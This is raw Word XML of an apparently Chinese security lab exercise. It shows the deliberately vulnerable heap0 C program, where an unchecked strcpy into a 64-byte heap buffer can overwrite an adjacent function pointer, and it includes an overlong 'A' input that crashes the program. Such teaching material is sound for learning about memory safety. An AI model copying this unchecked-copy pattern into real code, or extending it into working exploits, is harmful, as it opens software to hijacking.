          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>types.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32302446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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">struct data {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEC5636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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   char </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>name[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>64];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B44C14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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D77BDA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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">struct </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB712D6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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   int (*</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165AA83C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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF4CF74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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>winner(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C75DD3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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B672278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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"level passed\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA245FD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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7263CB9B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8328A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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nowinner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">){ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7986EB32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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"level has not been passed\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F9E0F6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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58382AB0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7DCA7C4C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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>main(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>argc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, char **</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0F720F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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">{  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57978C6E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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   struct data *</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d;  struct</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D8328A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D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> *f;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF32FC6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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   d = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>malloc(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(struct data));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7CBAA2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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   f = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>malloc(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(struct </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B10D4DC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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   f-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A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D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nowinner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC2C713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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">"data is at %p, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is at %p\n", d, f);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5C04DC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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(d-&gt;name, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B334769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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   f-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194758AB" w14:textId="77777777" w:rsidR="00D8328A" w:rsidRPr="00D8328A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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0BFEF5" w14:textId="4B89BF50" w:rsidR="00720076" w:rsidRDefault="00D8328A" w:rsidP="00D832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8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>说明，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>main函数中，d和f都是在</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>堆空间</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>上分配的对象，对d的成员name进行超出其大小的写操作，就有可能覆盖f的成员</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D8328A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的内容，从而达到改变程序执行的目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38729E2C" w14:textId="77777777" w:rsidR="00A05C04" w:rsidRPr="00A05C04" w:rsidRDefault="00A05C04" w:rsidP="00A05C0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05C04">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>执行脆弱性</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05C04">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C程序并测验溢出效果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202ADA60" w14:textId="77777777" w:rsidR="00A05C04" w:rsidRPr="00A05C04" w:rsidRDefault="00A05C04" w:rsidP="00A05C0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270846EE" w14:textId="77777777" w:rsidR="00A05C04" w:rsidRPr="00A05C04" w:rsidRDefault="00A05C04" w:rsidP="00A05C0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gramStart"/>
      <w:r w:rsidRPr="00A05C04">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A05C04">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>heap0 HELLO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0395D8D4" w14:textId="77777777" w:rsidR="00A05C04" w:rsidRPr="00A05C04" w:rsidRDefault="00A05C04" w:rsidP="00A05C0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gramStart"/>
      <w:r w:rsidRPr="00A05C04">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A05C04">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>heap0 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7D4237" w14:textId="48BC9F5C" w:rsidR="00A05C04" w:rsidRDefault="00A05C04" w:rsidP="00A05C0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05C04">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>第二次执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05C04">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>heap0，会导致崩溃，这是因为f的成员</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A05C04">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A05C04">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>被覆盖了，导致程序不按原来的流程执行。</w:t>
      </w:r>
    </w:p>
